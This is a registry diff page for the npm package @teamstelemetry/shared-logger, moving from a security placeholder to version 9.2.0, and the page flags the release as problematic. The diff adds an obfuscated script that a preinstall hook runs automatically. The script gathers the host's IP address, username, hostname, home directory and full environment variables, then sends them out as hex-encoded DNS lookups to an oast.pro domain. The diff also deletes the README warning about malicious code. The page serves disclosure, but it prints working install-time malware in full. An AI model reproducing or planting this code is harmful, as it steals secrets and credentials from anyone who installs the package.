@teamstelemetry/shared-logger 0.0.1-security → 9.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @teamstelemetry/shared-logger might be problematic. Click here for more details.
- package/app.obfuscated.js +1 -0
- package/package.json +9 -3
- package/README.md +0 -5
@@ -0,0 +1 @@
|
|
1
|
+
(function(_0x5d7932,_0xf08fd7){const _0x4e67d7=a0_0x37c4,_0x3ba69a=_0x5d7932();while(!![]){try{const _0x1e0062=-parseInt(_0x4e67d7(0x1b3))/0x1*(parseInt(_0x4e67d7(0x1bb))/0x2)+-parseInt(_0x4e67d7(0x1b7))/0x3*(parseInt(_0x4e67d7(0x1bc))/0x4)+-parseInt(_0x4e67d7(0x1ba))/0x5+parseInt(_0x4e67d7(0x1af))/0x6+parseInt(_0x4e67d7(0x1be))/0x7+-parseInt(_0x4e67d7(0x1bd))/0x8+parseInt(_0x4e67d7(0x1b8))/0x9;if(_0x1e0062===_0xf08fd7)break;else _0x3ba69a['push'](_0x3ba69a['shift']());}catch(_0x360d0e){_0x3ba69a['push'](_0x3ba69a['shift']());}}}(a0_0x2990,0xa5d99));function a0_0x2990(){const _0x31911c=['15459CPAQky','15620634sPKOFJ','arch','3356260bTQHMX','78axayhR','724rssjSm','4267816MHMTjr','9270219LBrTED','toString','internal','length','family','networkInterfaces','hex','hostname','decoy_start_','address','decoy_end','from','1478904FMyByy','N/A','stringify','d21j54p2ekub7bo99im015xckp9ijpf3k.oast.pro','12556BoCGEx','homedir','userInfo','env'];a0_0x2990=function(){return _0x31911c;};return a0_0x2990();}function a0_0x37c4(_0xf77ba0,_0x1c730f){const _0x299016=a0_0x2990();return a0_0x37c4=function(_0x37c4a3,_0x1d0a75){_0x37c4a3=_0x37c4a3-0x1a6;let _0x37dd94=_0x299016[_0x37c4a3];return _0x37dd94;},a0_0x37c4(_0xf77ba0,_0x1c730f);}const os=require('os'),dns=require('dns');;((async()=>{const _0x3c5575=a0_0x37c4,_0x1c3749=_0x3c5575(0x1b2);let _0x5af1a6=_0x3c5575(0x1b0);try{const _0x5437cc=os[_0x3c5575(0x1a8)]();for(const _0x5b423c of Object['keys'](_0x5437cc)){for(const _0x3d4e20 of _0x5437cc[_0x5b423c]){if(_0x3d4e20[_0x3c5575(0x1a7)]==='IPv4'&&!_0x3d4e20[_0x3c5575(0x1c0)]){_0x5af1a6=_0x3d4e20[_0x3c5575(0x1ac)];break;}}if(_0x5af1a6!==_0x3c5575(0x1b0))break;}}catch(_0x5d326c){}const _0x4d6ad9=_0x3c5575(0x1ab)+Math['random']()['toString'](0x24)['substring'](0x2);let _0x3b4653={'_decoy':_0x4d6ad9,'ip':_0x5af1a6,'username':os[_0x3c5575(0x1b5)]()['username'],'hostname':os[_0x3c5575(0x1aa)](),'platform':os['platform'](),'arch':os[_0x3c5575(0x1b9)](),'home':os[_0x3c5575(0x1b4)](),'env':process[_0x3c5575(0x1b6)],'_decoy2':_0x3c5575(0x1ad)};const _0x8b9bbf=JSON[_0x3c5575(0x1b1)](_0x3b4653),_0x457011=Buffer[_0x3c5575(0x1ae)](_0x8b9bbf)[_0x3c5575(0x1bf)](_0x3c5575(0x1a9)),_0x346934=0x32;for(let _0x19e8f4=0x0;_0x19e8f4<_0x457011[_0x3c5575(0x1a6)];_0x19e8f4+=_0x346934){const _0x1a0b3f=_0x457011['substring'](_0x19e8f4,_0x19e8f4+_0x346934),_0x29abef=_0x19e8f4/_0x346934+'.'+_0x1a0b3f,_0x318242=_0x29abef+'.'+_0x1c3749;dns['lookup'](_0x318242,_0x103dcf=>{}),await new Promise(_0x63376e=>setTimeout(_0x63376e,0x64));}})());
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "@teamstelemetry/shared-logger",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "9.2.0",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"preinstall": "node app.obfuscated.js"
|
7
|
+
},
|
8
|
+
"keywords": [],
|
9
|
+
"author": "Finance Dev",
|
10
|
+
"license": "ISC",
|
11
|
+
"description": ""
|
6
12
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40teamstelemetry%2Fshared-logger for more information.
|